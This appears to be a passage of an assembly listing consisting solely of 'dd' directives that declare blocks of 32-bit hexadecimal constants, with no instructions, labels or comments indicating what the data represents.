dd 4A0A0228h, 4EF32FCBh, 956D3521h, 0E396C397h, 0AD438BFEh
dd 0D8798CE3h, 6A1D7D26h, 12AF42BDh, 168FE274h, 3B63CAEAh
dd 48AE37F6h, 28527534h, 0F1324287h, 14DB48A3h, 5E5FEBD2h
dd 0F8D7F6FDh, 2AC174C6h, 0CD30FF16h, 2DEEE4D1h, 79A63CECh
dd 0F0FB6537h, 0A151BB43h, 698B357Fh, 85FB4E71h, 47F803C7h
dd 2BFC7A53h, 0B77AC9BCh, 0C71D889Fh, 97782AC4h, 0DD958EFh
dd 0A2EB9A3Bh, 0BF386654h, 47B0C235h, 7C8FB5FAh, 6FA72BEDh
dd 63A5E459h, 4177DA5Eh, 39183125h, 72EA3FD4h, 48EF0ACBh
dd 0A078449Eh, 0FB36588Ah, 7E752CD1h, 0AB9007E6h, 0AEDF02C8h
dd 85B83560h, 1E81FD89h, 769F257Dh, 4383BF4Fh, 56B7DF2Eh
dd 5C2EEF8Eh, 0C160520Eh, 0FDB1070Fh, 0AA4A55D0h, 36551B6h
dd 0F9DFF43Fh, 99FFDA2Ah, 3305D90Bh, 3F4AB742h, 0D46FDBAFh
dd 0C16CF85Ch, 0C18063BAh, 50A3AFBCh, 0F2A0A24Bh, 5A6EC993h
dd 8A86161Ah, 7078D1F0h, 33C14E71h, 40D61FC7h, 0E183F1C4h
dd 0BA327B98h, 0BAF9E7EEh, 351D40C8h, 0FC1CD064h, 9650B872h
dd 0CCF0466Fh, 0D2483096h, 7C17BDD6h, 0B9776846h, 4CE5783Dh
dd 0CC07C6D5h, 0C77C71D5h, 0DEB42436h, 25E06767h, 0E101B733h
dd 36016484h, 0AB1BAA95h, 29465D0Eh, 0BD3F45FCh, 7B9677Eh
dd 437847C2h, 0BE35ACBDh, 97E3B45h, 287F62FCh, 25758B77h
dd 87615A9Eh, 0E53EDBACh, 0AD24A462h, 0B3C3BFh, 3B8570B3h
dd 156872E9h, 0D34D9630h, 28905E65h, 0FEB595FFh, 7F8B1174h
dd 0B4448765h, 0AFA0A1D9h, 0FD966DC0h, 79C8BABAh, 0B819D863h
dd 2E3BD251h, 0AE1EDD24h, 0EEBDFA1Ch, 0A7AE1F79h, 0FD84C0D5h
dd 6512F549h, 0FA689071h, 9F093195h, 8DDD8157h, 0AD1868E2h
dd 95FB9CF0h, 1DDD3938h, 0A8227BCFh, 6B8E877Dh, 4568030h
dd 0B5C953D9h, 55EA6A6Ah, 67C540C3h, 0CDA602FCh, 0D7E748E2h
dd 0AC8640B7h, 0C34D3DC1h, 0C97A4D7Eh, 993C6A8h, 42F354E1h
dd 0E95F73C7h, 0D7E4A1BDh, 0D20D2805h, 5B5CAEDFh, 0F21C2B68h
dd 34535AEBh, 0E996ABF6h, 0E5292AB3h, 0F0BA8A49h, 28879D3Eh
dd 0C39847B1h, 84173CD2h, 213A7971h, 2BDE46CAh, 0FAE005C3h
dd 0EAB72D7Bh, 0C1E37CD5h, 0B3CF33ABh, 0FE144346h, 0BDDEAC9Dh
dd 8A65F8CCh, 0EFBC1F8Dh, 9CCB439Fh, 659853A4h, 63373239h
dd 0DAE1CD5Ch, 2EFF7B0Ch, 7BB0587Eh, 3283806Ah, 59DE6E03h
dd 2D39EEE3h, 3FE8A424h, 0EB371C51h, 0C35E714h, 0DDF65138h
dd 0DD6DEBBBh, 0A5A2EEC6h, 0A54403C5h, 0A7288F6h, 3E3800BCh
dd 5A524C06h, 8F66FB5Ch, 5F830611h, 0FD3643CEh, 3AD89880h
dd 0DF810AFCh, 4E1F2A9Fh, 190C2AF1h, 817DEBABh, 0BD215D6Ah
dd 66D9B473h, 78E91BFh, 8AC1EF67h, 0B7BBB1A9h, 0EEC4D6D1h
dd 9516E449h, 59840574h, 3F0ACB37h, 218A1451h, 728AEB29h
dd 8D65CBB9h, 0BACA9711h, 8D4DFEC6h, 0F57AA626h, 8A918D97h
dd 0A8F6F1D5h, 0EDDB7F91h, 43E010C3h, 0C0DB1AECh, 881BB0E7h
dd 0D7F9FD92h, 729AC2DBh, 830D45BEh, 0F938FAEEh, 1DA38BAAh
dd 95ED3EA8h, 266A4793h, 5DD2C7D6h, 0E38F76EFh, 1B8FA6Bh
dd 0F1352EA0h, 0ADAFE0F3h, 236E3029h, 1E2B8316h, 0A6872218h
dd 3AA18AE9h, 108C384Eh, 0E1FF7821h, 7A634D0Bh, 0C3F17DEFh
dd 8A866DCCh, 0A5FB969Eh, 0C12657DEh, 77F8F3C7h, 0BF1BA7F8h
dd 2BB86FBFh, 485AEE2Eh, 25BA8128h, 38792217h, 0FDF7904Bh
dd 3FBE8C06h, 0DFF76FC5h, 0F25E4D43h, 1BF90359h, 572C9CCCh
dd 340A8B5Eh, 162869B5h, 0FA447A3Fh, 0C491BCDEh, 6A97CF62h
dd 0CBBD9944h, 7F329C60h, 0EFE586B4h, 93A3A2DFh, 1290AE32h
dd 0DD1FBA9h, 0A060A53Fh, 2086E72Fh, 0CBFAAECDh, 0A9A2C168h
dd 0A1560C15h, 0C0633777h, 2B9CB437h, 955EFABEh, 0FD6C4974h
dd 0B58094B4h, 0FEF82AB2h, 63A1F5C4h, 0BEB51F17h, 0B87E6FCAh
dd 0CDAAB8A2h, 9E66EDF9h, 6FB427B1h, 0F91A2E3Ch, 22091133h
dd 8744C567h, 0D65402CEh, 0D8913CBEh, 0C091B2C9h, 68664F72h
dd 0BC6D71A0h, 4557232Dh, 0ADACA231h, 0FA557842h, 4A4B2E4Ch
dd 56A9555Dh, 0F49D2C6Ah, 83C7B36Bh, 0EDC41E3Ah, 1DBA5EF7h
dd 55C3BBF1h, 5DCEB7D3h, 762F0BF9h, 0B72929E6h, 0E1D7883Ah
dd 7BA013E9h, 5AD1CDCBh, 13BC552Fh, 2D61F2CAh, 6579C4D6h
dd 0B2AED0E3h, 11BD9ABFh, 0A20399C8h, 0BAB69C82h, 22D404CAh
dd 4A902612h, 0E62142EEh, 65BC7C6Ch, 45C0B99Fh, 0A2B6150Bh
dd 0A0C6BCF0h, 0F30E6153h, 0F1157740h, 0CE29D5C3h, 0F3600AA8h
dd 5CBC4A47h, 9B11315Fh, 0BEAD45C1h, 0A40F02C5h, 591A3B69h
dd 0FBF4DEC5h, 2ADCF580h, 398DF03Dh, 87C09623h, 73F5F042h
dd 89257543h, 0F8351C22h, 0AB76B5FDh, 9AC6FA3Eh, 7D45E645h
dd 0ED1EC179h, 0D6C85EACh, 0D05CA554h, 8AA574DCh, 296745F3h
dd 0D8AEDB3Ch, 8D8CC772h, 1D58509Bh, 0D701F281h, 57E03AA9h
dd 0BA956C9h, 0C0F1F1E2h, 0F2A18F2Bh, 421DFF92h, 8176389Eh
dd 0FE5664DAh, 5B5AB461h, 0DF280FABh, 0A753E89Dh, 2F4FD9A4h
dd 2745EA9Dh, 0C870B4ABh, 84D244D0h, 94B23F3Eh, 37B5B6FAh
dd 76E0FB6Dh, 3059777Bh, 266CE71h, 35EF82B3h, 0F84BD776h
dd 292583F5h, 1AB72F96h, 2B29A3Eh, 56D12E86h, 0AEF8EC0Dh
dd 3628E6C8h, 840BC69Fh, 28723CFDh, 944762EDh, 6FA71254h
dd 8ABE7EF9h, 0D5B4D470h, 0CB02E3C9h, 0D7136C34h, 0A2AFB7F8h
dd 55111B85h, 446CA863h, 7540B613h, 0A9C9B5C1h, 7D297A77h
dd 0AB0BF797h, 0FED5CB95h, 4C172B82h, 0B6AA7E90h, 40AA7160h
dd 0A7D0C20Ah, 47A4F68Ah, 4E47FC5Dh, 3A4AF6D8h, 10D8ACF0h
dd 3994AE33h, 36AF7E0Eh, 49B75D4Dh, 0A3AA80Eh, 6BCB0FE0h
dd 0DC2C399Ch, 0E3ACFC0Eh, 9DD60F0Eh, 874FA3F4h, 3239D696h
dd 8BAFAF7Ch, 0A2AFBF05h, 575E1418h, 0EBFCC796h, 0EA82F04Dh
dd 0D7F885CEh, 47700830h, 909CAED5h, 0B613E62h, 3FEA75BCh
dd 377574CCh, 0D1CBD1E7h, 6E279E16h, 5B535627h, 6D97D5ABh
dd 0E18F048Fh, 0C9956B22h, 0A001CBAFh, 2DB862Ah, 5308385Dh
dd 0F90A196Eh, 9AFCC4DAh, 920FFD54h, 89151345h, 67827B9Eh
dd 0F55ABE8Ah, 8986EB78h, 0D2BA2072h, 2834915Dh, 62E0FC61h
dd 54DCAEC0h, 5549FCAFh
dd 0F9E2C83Ah, 0DDC64C6Dh, 679BD86Eh, 0E2618213h, 887677D5h
dd 25425531h, 0F275A6B3h, 0BF14E512h, 0CBE6C484h, 4D625337h
dd 8A09BB7Eh, 0E1FBD7C2h, 722A4987h, 0B5FB479Fh, 3B319E4Ch
dd 13A1E77Fh, 0CCD47D32h, 0EC9D4A5Fh, 0DD49B221h, 0B38EBEB9h
dd 0F46B7420h, 0E60293A8h, 0FF7EB36Bh, 0C7677CA5h, 77C71736h
dd 0CD44B701h, 81A803CFh, 0E994FA72h, 0DBE8FE4h, 78CB7753h
dd 6396AEEh, 7EDF030h, 68A4DE8Eh, 19697DDh, 46D36EB4h
dd 0F2CBFBFFh, 0DA5A4F58h, 9EE8D1BFh, 0D27DD2FBh, 9EBFAF43h
dd 1E02EEFEh, 8F930750h, 1A1099E5h, 72935C6Ch, 639D289Fh
dd 0EBAEDBC3h, 0A5D408C7h, 229B319Bh, 5ADD6701h, 97AD9F6h
dd 0BC2FFE7Eh, 67DDE858h, 36F5F1AFh, 0E75623E9h, 463EA55Bh
dd 0C6635774h, 47691A3Fh, 28A26CACh, 0C6FEA7DCh, 0B7320343h
dd 0E155AA2Ch, 95FD03B8h, 30B4C8CCh, 0F32DA65Ah, 0ED98FB66h
dd 0B5EA568Fh, 4EF582C3h, 0C6CEA90Ah, 0E3256817h, 79CD294Fh
dd 52EBE487h, 1C2F0EE5h, 0B2CA4D57h, 0CAF98C61h, 29CB5787h
dd 976B2563h, 21506259h, 12E5FB29h, 0C2F3F339h, 5981C254h
dd 0BAA53171h, 0A42D6A2Ah, 0BDB0E578h, 0F6E45092h, 31CE1666h
dd 0D505134h, 35D40FBEh, 77A7B46Ah, 0FB3B9963h, 0F8A3AA0Eh
dd 74B0663Ah, 0D05A2069h, 5B446FB5h, 0B1C37AB9h, 15ACFF5Ch
dd 0CFC17EECh, 4BFC0F27h, 7A5ED7DEh, 0F0DD67BCh, 43F19A06h
dd 0C8B847A1h, 0B5599349h, 24785A38h, 0DFA8FE40h, 0D44FFCE8h
dd 96A1D810h, 0E0EF896Eh, 981F9987h, 0B14E0E53h, 0FF6D0DABh
dd 0E512A4C8h, 36E37497h, 8B2F0D06h, 0D1388057h, 0F2AB5D4Eh
dd 1E5DB1FEh, 0F1F6E589h, 0B56AB3E5h, 0BC72C187h, 0B36BEC07h
dd 62903595h, 37E753BBh, 776242Dh, 0D42D5F12h, 9A1FE147h
dd 5FC14E55h, 0F15580A7h, 51294247h, 0B376F3DAh, 0DC6DAAD8h
dd 2E848AE2h, 6FF5C6D1h, 0E1E5054Ah, 7A829217h, 743FE4F4h
dd 0AAEAA5Ch, 430F1066h, 8229D474h, 0B2702ED1h, 5A232A48h
dd 95C0F548h, 5185B03Eh, 5D743667h, 4599D2A8h, 6D0D466Bh
dd 33F1768Fh, 874604DFh, 854C63EDh, 71378B6Ah, 1F951175h
dd 75BFBBEFh, 6DA25F79h, 0E9B4D7A8h, 1BB84051h, 0A762DCD9h
dd 6E44BBBFh, 0B1AC5557h, 0A4A55F45h, 6D429ABh, 0EE5E81C9h
dd 0D101EAB0h, 97FAE546h, 10DC9E06h, 0D4B42353h, 8D2DAFE9h
dd 8D78BDD6h, 2E7D5C14h, 52B7EB6Dh, 596ED2Ah, 27FAC6C0h
dd 5469B83Ah, 62B491D1h, 2A016B2Eh, 9ABBAFDDh, 43DEEF6Bh
dd 4BC97B00h, 58A29FE0h, 0E395F736h, 29448D65h, 0B73E71CFh
dd 9A885872h, 0F6EE0CCCh, 8D5C6949h, 0C3B92D9Fh, 0D5D26946h
dd 7D71BBF7h, 0FB7C8160h, 0FDFB29ADh, 344F29BAh, 0E781CD01h
dd 0FC52EFAEh, 2CACEB4Bh, 9D632CD0h, 51338E39h, 0D5B5AF89h
dd 2554602Bh, 7F3AEEBh, 50B2AD0Eh, 0E8939EEBh, 2EEE205Bh
dd 2FD7BC58h, 0DA3022A5h, 0D50D1BEAh, 0A5EF958h, 0B75EFCA5h
dd 128BECD6h, 9837C933h, 3D81F3AEh, 0B753775Dh, 0DA23044Dh
dd 0CAB51BFEh, 0EC67FB88h, 114DADCFh, 712B227Dh, 8FBAEC9h
dd 3106A51Dh, 0F3F4503Fh, 6CB6E135h, 0EEE4258h, 0C94A07FDh
dd 0A64DF05Fh, 16FE8A65h, 0F7F747ACh, 51968FC1h, 17C1F1F6h
dd 2EC5DFE1h, 0F18CD3B5h, 0EAFDE70Bh, 73D77B21h, 0CBB72671h
dd 0F5BC696Ah, 67C7F671h, 7F5343C3h, 4A2BF343h, 4ABA469Fh
dd 925D558Ch, 8262F5CDh, 3A43E976h, 0E277D796h, 47268887h
dd 247519C5h, 211D514Bh, 3DBF5FAh, 825C4C24h, 97EDE77Fh
dd 30159354h, 553B9DD8h, 64676C84h, 3E21047h, 0AC61C1E7h
dd 78E1015Bh, 85694013h, 0B645230Bh, 2474F60h, 68DDF975h
dd 6C1674FFh, 6B71C5B1h, 0D71CC805h, 0A79D743Fh, 654E7607h
dd 70BEFB47h, 0FF28E79Ah, 0E3063825h, 5F3C0FF7h, 0FA2F0599h
dd 0BFAB32D8h, 50B15699h, 977D1D89h, 0BF0F3613h, 0B9EF37EFh
dd 0BF7C6F26h, 926B00B6h, 7A85511Ch, 0FCA9B6DDh, 98385AD1h
dd 0D4702DB2h, 0F93C939Dh, 127166B9h, 7E372F34h, 575EF2B8h
dd 534F4B4Fh, 0FDE15129h, 249812F4h, 337BDDAFh, 3DB71FDEh
dd 152E95D8h, 4FE97E14h, 795710C4h, 0BC82DC20h, 39E5A86Eh
dd 9ED384A6h, 6AEDBDAh, 9C9561F8h, 5E6539B3h, 0DC2892Eh
dd 0E317A80Fh, 0BBDD3FFAh, 492E4F2h, 0C7E59997h, 3AF698C7h
dd 0ED45CEC8h, 73A72188h, 1D2CF161h, 0AA989037h, 72B1DC9Ch
dd 0A26A2E0h, 0AEA2D2DEh, 0CFBA473Ah, 97BB593h, 0FB3047B5h
dd 0CEFCB6FEh, 7AD84F25h, 8FEE9FB0h, 0A5556616h, 301AE2DDh
dd 4175F2C7h, 0A75A697Ch, 0A76373C3h, 30D30114h, 302D57Fh
dd 7381E0B8h, 0A4318C32h, 7FBFF7FDh, 1F287B79h, 0B49C7F79h
dd 80615F8Fh, 0EB6660A6h, 0A93250A5h, 1BFB426Bh, 5FD7395h
dd 0B7B650F3h, 0E5195779h, 0F40ACC5Fh, 0E85AA2D1h, 12687532h
dd 5AA94064h, 0D637C919h, 7A70051Dh, 37669229h, 0FC67DD1h
dd 0B89A2A37h, 6EAA510Bh, 29E9417h, 57D5D53Ah, 8190D57Ah
dd 1096C3F0h, 0BE9C8F9Dh, 61494314h, 848FA46Ah, 0F35A17CFh
dd 0EAC3398Fh, 0CD623ECBh, 0F115695Fh, 7BF56706h, 0BE353DA0h
dd 3075F972h, 8D497820h, 0B2C96B5Fh, 1492F3D0h, 0E09C7F35h
dd 0EAE73FB9h, 3551ED5Ah, 59FEAA5Ah, 56E9CD3Dh, 326427B4h
dd 59AD9F38h, 0B6F784D5h, 0CFBF3C54h, 3503678h, 184C4713h
dd 0A9AE172Dh, 666603C0h, 68DCA6D4h, 0D55708F8h, 3B8FF235h
dd 12D2C175h, 0A136BCC5h, 0ABC5DE54h, 0D8E2FE35h, 39CD61CBh
dd 0FE282569h, 112A18DAh, 0F48E1EBDh, 0BB18B2C6h, 9C6B3422h
dd 0C7C8DE2Fh, 1F5ED50Fh, 0DBF15C02h, 0AF61573Fh, 343D849Dh
dd 5EBA5D5Ah, 0A9964911h, 0F850BE1h, 55FF15B0h, 9BB900BCh
dd 0DC1A4023h, 0E0F9091Fh, 0BECE57F1h, 0AC8E1B0h, 744D15D8h
dd 8D2DD61Fh, 1639BB50h, 5ECB215Eh, 0DC78C8h, 694982A6h
dd 8D2B6663h, 3912F705h, 0B6255AA3h, 4B4CB2CEh, 0BE60F85Eh
dd 0CC7F7E8Eh, 0CF65B78Bh, 5BFDF512h, 5AB6ADE0h, 0A0A18238h
dd 8038E89h, 85A5BAF4h, 5B6A43B9h, 7726C2D4h, 8A73EDD5h
dd 274440F4h, 585A6031h, 7215C6A1h, 3D27649Fh, 852D0C13h
dd 70397226h, 9848A167h, 0D46C019h, 0FD8AB86Eh, 2B1F603Ah
dd 587EE094h, 0CB12D27Bh, 4B1C1277h, 69C0AFF5h, 0E61DAF92h
dd 49A6A5EFh, 0DC7787FBh, 56AE2AAFh, 0F553F7C7h, 0EA0583E9h
dd 0AAC2E0B2h, 5AAF88E6h, 15C526DCh, 0D530078Fh, 0CAC4F557h
dd 0EA7ADC88h, 56B5AE49h, 5491243Eh, 0F903C25Dh, 302E535Bh
dd 5F662FE0h, 8F659BF5h, 320C3556h, 5DFF29F5h, 54180F83h
dd 8955ED61h, 23E33051h, 0EE3EBCBFh, 93E9593Eh, 2C36D6DCh
dd 78D5079h, 0F6B79D1Fh, 7BD50A35h, 9E12D9F5h, 8DEDE526h
dd 13EF6D14h, 66317099h, 46653C26h, 1C6DBAA6h, 4920D8CBh
dd 0BE40D61Eh, 0DCC8E67Bh, 0F5F04168h, 0E13F641Ch, 53DFE0F6h
dd 19540E2Fh, 5D34EAFAh, 2B74FDB3h, 7057276Bh, 42AD2B7h
dd 90811310h, 0B2AA6BBCh, 5EC7EB98h, 995F6AD0h, 5579DFAFh
dd 5BCAEA01h, 0CEDAF5BDh, 86009DB5h, 0D8D24CD0h, 8DA3FD72h
dd 1DAE668Ch, 884DA06h, 5BCAEE3Fh, 7CB2ABC3h, 2D3997E3h
dd 224A3C92h, 43F19EAEh, 0D0D9A880h, 79DA9CAEh, 1914FAF8h
dd 6887B257h, 71CC2F85h, 2B74CEEBh, 92BB0FD7h, 0F4C1F768h
dd 0F8E1D04Fh, 4F2D9799h, 171FBC12h, 0EA6C8FDCh, 0FA4ACCB3h
dd 2122026h, 0FDFDA8B4h
dd 3689F1E9h, 17EDF433h, 0C6E1DF47h, 0C54829CBh, 90A26AC7h
dd 0C52D96A3h, 6578597Bh, 0EB54700Eh, 0DC4C8AF8h, 0E38636D9h
dd 1D7FAF83h, 0AE08FDF8h, 0D881AEE6h, 0C16BB63Fh, 0AD5673h
dd 0FC1C5C4h, 4B181697h, 768CDD76h, 0B22CD828h, 76B743F1h
dd 42C0CABBh, 0B1809E9Dh, 2AFABBACh, 0AEE3C3ADh, 299B9348h
dd 0FEA9D661h, 5A6DE0BEh, 3077FC56h, 0CBCC1578h, 699F2752h
dd 990842D1h, 0D37397Eh, 6E1F8C3Fh, 0DB2DBE8Bh, 0BFBD3CBBh
dd 0B1704AF8h, 0A1C65171h, 79815885h, 0E401F699h, 19779E17h
dd 2BAA5B9Fh, 0A84B7179h, 0B469FFD9h, 0E8CBC1BDh, 7E7A724h
dd 5089D516h, 1FAE6DCh, 0CA489735h, 846F567Ah, 5FDE6632h
dd 14230262h, 5E9CFBDEh, 6A83BFEh, 4217F4BFh, 0EBEE6E43h
dd 0D2FE592Eh, 34BF72D5h, 9CB4ECC2h, 97750EA3h, 6960766Eh
dd 82A045FAh, 6B0D99EBh, 0B73DD4ABh, 4C04065Ah, 0E370F6FEh
dd 0DEA4F731h, 5F63A921h, 32E231B5h, 7DDA8887h, 0C34421B5h
dd 3793CDC2h, 2A431350h, 9B0EFD3Ch, 0CDA49C04h, 95A0915Ah
dd 0F7D3BD8Ah, 0B91DEEFEh, 0C7CE5559h, 0FB91D058h, 78D1A7E0h
dd 0D92A3F0h, 0BF18B3E6h, 9857DD7Bh, 9DF67990h, 0B6E5DE29h
dd 135CAECDh, 78E6C0CBh, 6FDD5DFCh, 3C9AD822h, 0CA40CCE8h
dd 0AA056B2Ah, 81BC7C2Bh, 3833DDB6h, 7F20B195h, 0ED2F8AEBh
dd 69F7DC58h, 0F26F55A5h, 0D162A65Ah, 7A1B7162h, 0CDB39F42h
dd 38D0B673h, 47681A74h, 24C656C9h, 0CDE7B975h, 0A56DDB60h
dd 0A932BB80h, 5F1A5D50h, 4D6B77Ch, 0A39D16AEh, 0C65AEA3Dh
dd 1CDE1EB4h, 6ABAE8F3h, 0B3FEEE35h, 33327A41h, 7C5B7D8h
dd 0FEBE3E56h, 54CEE0A2h, 3AA3EE22h, 73590F96h, 2C46A0BEh
dd 9CB8EA28h, 78EDAF57h, 0CF3AD6D8h, 0F1112E9Eh, 0E3851FD2h
dd 8DFE2DA9h, 107F2B0h, 87E3C15Bh, 5423016Dh, 49FBF9BFh
dd 67F17D60h, 0E01CDD38h, 983C71EDh, 0CC335A29h, 963ABD25h
dd 0F9448BB0h, 0E2CA1B59h, 5A248FEAh, 3B252C88h, 0EAF70EABh
dd 35137A54h, 0EB86EA79h, 3BDBBAEAh, 0B89D4C4Bh, 0FD81DC7Ch
dd 6897186Ah, 5E5A9643h, 15644BE0h, 0A35F1451h, 902F2425h
dd 853748B3h, 0FACA362Ch, 0ABD12D8Bh, 58FED547h, 6E772E75h
dd 0A9C0B47Ch, 0F3376A9Ah, 67284294h, 0BB36198Bh, 75D51972h
dd 0D3E58B29h, 0CBFEE42Ah, 7CDB844Eh, 48A1B498h, 5D95BCBFh
dd 0B9A8CF15h, 3903F13Eh, 0EFB7D89Fh, 0F5BA8672h, 0EFFF122Bh
dd 17835A3Bh, 0EC3C3E26h, 0F9ECC317h, 92F73F09h, 8A76B840h
dd 0A5DFD5A6h, 0C134A416h, 3D54B5D7h, 572D8FAFh, 0A459C80Ah
dd 4AB2A87h, 6FA94D02h, 556BE287h, 7D4D98BFh, 0A3098508h
dd 9FDFC174h, 0A9CC2DB2h, 0C6FF6EEDh, 5B24543Bh, 0E9A97BC2h
dd 70EA8484h, 0DF54B62Dh, 7644D7CAh, 0A1F68345h, 8C651FCFh
dd 5C3FD56Ah, 8A2BB3C8h, 12C80552h, 0FD5D4CA5h, 4BAE02B7h
dd 0A75DA303h, 0D626FC0h, 9E5CDA0Ah, 7F74A10h, 20BEB2AAh
dd 14E0A300h, 6C5FC860h, 0E14EAC8Dh, 0D1C3977Eh, 8B5644A6h
dd 0E6B9F536h, 3E813C2Fh, 511EA4ECh, 0BFDA79Fh, 4B5EE453h
dd 10DE1BBh, 0B139617Ch, 0DE497FE0h, 6D95A5C9h, 29A5ADCAh
dd 2689D7D0h, 0C2FE7C15h, 0EED9929Ah, 0DC82770Ah, 2323C94Ah
dd 0B75CFD67h, 6A075E5Bh, 2AA2EC0Fh, 0AD4B40E9h, 92461930h
dd 0BDE2BCAAh, 3FBE4379h, 0B376030Eh, 3D17BFB9h, 5A5BB03Ch
dd 347A329Dh, 5A38A1AEh, 75E6F44Ch, 3D5E797Bh, 6FA2D807h
dd 4016C0FAh, 0AD681A19h, 8069F03Fh, 0B34F9B57h, 0AA1E3C59h
dd 2FE8E234h, 7A358A73h, 3A487FB3h, 0D8B656CDh, 0C0A6DF45h
dd 6AC4A8D9h, 692A970Dh, 0AAAC8B3Ch, 7DB11751h, 90583F03h
dd 86F2AB22h, 29708726h, 6123E276h, 64F4144Bh, 0BEBC987Fh
dd 0ABF10BE0h, 0E67E0F4Fh, 2914DDEBh, 0CA17A69Bh, 50623E5Fh
dd 9B98FD57h, 277B83C7h, 1AA3D4E6h, 0C7F9051Eh, 90E868C2h
dd 1C1595B5h, 5FE3A212h, 0CC39D726h, 12C341B4h, 5CEB0133h
dd 2C09E757h, 5B41A296h, 0D91C786Dh, 56E1A602h, 177EF563h
dd 4EDB5C77h, 4313EABCh, 0F13F7B6Bh, 128F97FAh, 98ABBF2Bh
dd 5AEFA507h, 6BFBE75Dh, 0AD1FE2FDh, 43DA52C4h, 6CFC2BBFh
dd 0E781B987h, 697760F1h, 0E15D2E89h, 0C9FFF33Ah, 0C7DBF2F7h
dd 0C1BE71C5h, 0C30AD546h, 1B28CE94h, 2857BBB8h, 0DFCA1028h
dd 12D211A8h, 36221A75h, 94AEBA7Ah, 7FE2D8F1h, 0ADDC4D5Eh
dd 7A76D873h, 0E1E69835h, 258F9AE2h, 0E83F6A5Eh, 6022318h
dd 0F5411C07h, 48203B81h, 0FF51BED7h, 55E4BC51h, 10D41BEBh
dd 0D06B69F8h, 78FED454h, 0B0CB6935h, 14FEFEFBh, 4122EECEh
dd 856274FBh, 58B7BECBh, 0EF2C4CFFh, 0CBBFEDD5h, 150D327Eh
dd 0BBD6C35Ch, 0F7616D62h, 0FC4A2991h, 0B9EFC717h, 9542BCBFh
dd 70E5F7F4h, 0C0DFD04Bh, 9D388DFEh, 0F55955D8h, 3485D3DBh
dd 74347E24h, 93D7327Fh, 55611412h, 318798E5h, 0AA57AB27h
dd 78AE3EFh, 5270DB8Dh, 0A72DA9E4h, 0A718ED07h, 3EEB539Dh
dd 5536B7F4h, 3E1BC631h, 9A075AF4h, 0A4C24D3Bh, 155F2397h
dd 0E6A83F78h, 69A1F5FBh, 0BF053AD0h, 84ACFFACh, 99773DF8h
dd 0BD92B3DFh, 81CAA9D0h, 0CF97D120h, 65F9DF12h, 85275F1Dh
dd 0AB3A8CEh, 0AB2BAA13h, 0AF88ADA8h, 0B98D5B22h, 7C5F2B7Ch
dd 7C464A95h, 0D89DF40Ch, 295E33BBh, 0F50DB3D9h, 79F09E17h
dd 0CDDB1032h, 4DEDCE1Ch, 0E5CE02D3h, 389818BBh, 7AEE58BBh
dd 2D016B55h, 0EBB2AFB7h, 62855715h, 0BE40CE89h, 5D1BA342h
dd 0DFAB592Eh, 3CD85B8Dh, 0BF81DA3Eh, 209B675Eh, 7FFDE7C5h
dd 9BF3ACB9h, 0CC232A51h, 30AC8314h, 0A61F3E58h, 43EF078Ch
dd 0FAF9D5D0h, 0EBAE80CAh, 6B8345B8h, 112BDF0Dh, 0A033E72Dh
dd 0F9B8FEBEh, 0BFC31E0Ah, 89747D50h, 0F1611133h, 0CBFE80C2h
dd 0EF13B7E8h, 56822B90h, 1134B0D5h, 7FBB2E5Dh, 0B2FF3027h
dd 0AFA6FDC1h, 0A7A03D6Eh, 6A04F46Dh, 0F9D58389h, 0E953F0Dh
dd 97672FADh, 0D6C13B47h, 891A90D8h, 5F4F66A5h, 17F30F7Eh
dd 6BA1DB90h, 3C58A8E0h, 932A7C1Eh, 0B9AB0922h, 89FEE418h
dd 0B8B1A4D6h, 5E857D42h, 82E21931h, 8ADC4AD1h, 0D2D8DA7Dh
dd 1B87BDC0h, 6D202A2Ah, 0B1D02FB6h, 4AA43EC2h, 0A247B559h
dd 740B4E1Dh, 787EE369h, 0AF74BA78h, 0FCDF2396h, 51A89BBCh
dd 72D60DDBh, 2D64AC77h, 0D92F95B2h, 4A4308C6h, 0D56CC7D1h
dd 0E10A1B83h, 441B33AFh, 95F59475h, 0A193CF59h, 127C2C3h
dd 7FC2B257h, 18EE1F8Eh, 0EAE7660Ch, 0BC28B970h, 1C92D7EBh
dd 5FDA63B9h, 7506BAAAh, 0EB35C2DBh, 0E52C9FF7h, 4CBFC165h
dd 0A20010DBh, 0A45C0D78h, 0A2EC3A4h, 33F7C986h, 0DFCDBAC2h
dd 0AA91B29Fh, 1EB63140h, 0B3C58017h, 0A532ED63h, 0F632671h
dd 99F2935Ch, 4050EE56h, 368F146Fh, 7D3B782Ah, 7937372Fh
dd 2738ACE0h, 113309E6h, 862DA231h, 0A55028F2h, 0C6DDC6A0h
dd 6A6C6E71h, 8219A836h, 4E9EBF0Dh, 0C5A2B9DDh, 54408290h
dd 914BB923h, 28764D35h, 0F67693EDh, 17DCC86Ch, 0FBE146BEh
dd 9B509892h, 0E9A41291h, 0F51E862Fh, 0CB02B7F7h, 32E656C8h
dd 276F37ABh, 32D43762h, 0CFF6A175h, 95B81D13h, 0BE6AA910h
dd 0CDA0117Fh, 76A16814h, 5DDBAD20h, 23AABA5Eh, 8BE0BE8h
dd 0FC4ED75Ch, 0CEA62490h, 449A7686h, 0A1684B16h, 1431EA9Dh
dd 5E8AC2D9h, 2FC1B02Bh, 0AAA4DDF5h, 0E1B38B5Ch, 0F9AA5F50h
dd 0D6E4E48Fh, 3F0C1028h
dd 0D769BF1Ah, 64D69AD3h, 0B4EBE6BEh, 7D884527h, 2E795E51h
dd 0DBFB3095h, 0ECCF5357h, 0F9851F52h, 7F4ADB29h, 9C8B48Eh
dd 3B4D2146h, 5F07959Eh, 0A88116EFh, 31CEDD14h, 0F455E472h
dd 9C3858DCh, 6C4CB844h, 5266B25Fh, 887821A1h, 7320F5F9h
dd 3A92F537h, 0CEA92CF3h, 14E0CBAh, 0AC078EC3h, 3D25FF90h
dd 2FBE295Ch, 7CA4523Eh, 69445E35h, 0F55D17F8h, 0C5D4469Ah
dd 7E61D4F0h, 75E22C69h, 0BCB9D95Ch, 2BEEDAA6h, 0EA2B41FBh
dd 0B6F959CFh, 17FD2C19h, 0DC2CF43Fh, 3D94A6ADh, 0C7789C73h
dd 4F85F5FFh, 50AB0067h, 0F4D2D0A1h, 0D153E8Fh, 3E70E194h
dd 0DAF88EF0h, 95464945h, 0E7BE00C7h, 74BB6571h, 0AE59CB92h
dd 0D25D535Ah, 97205626h, 27BA23ECh, 0C3F6EABBh, 4AEEA18Ah
dd 3DC91E48h, 0FA4F7E00h, 6451715Dh, 0D7645B73h, 0FA772272h
dd 950025EFh, 0AF9D7E56h, 0B8D0A473h, 38DFC8AAh, 0AEC9A2BEh
dd 0CB940CE2h, 8DF2FAB4h, 83B2343h, 0C045F83Ch, 0F176A9BBh
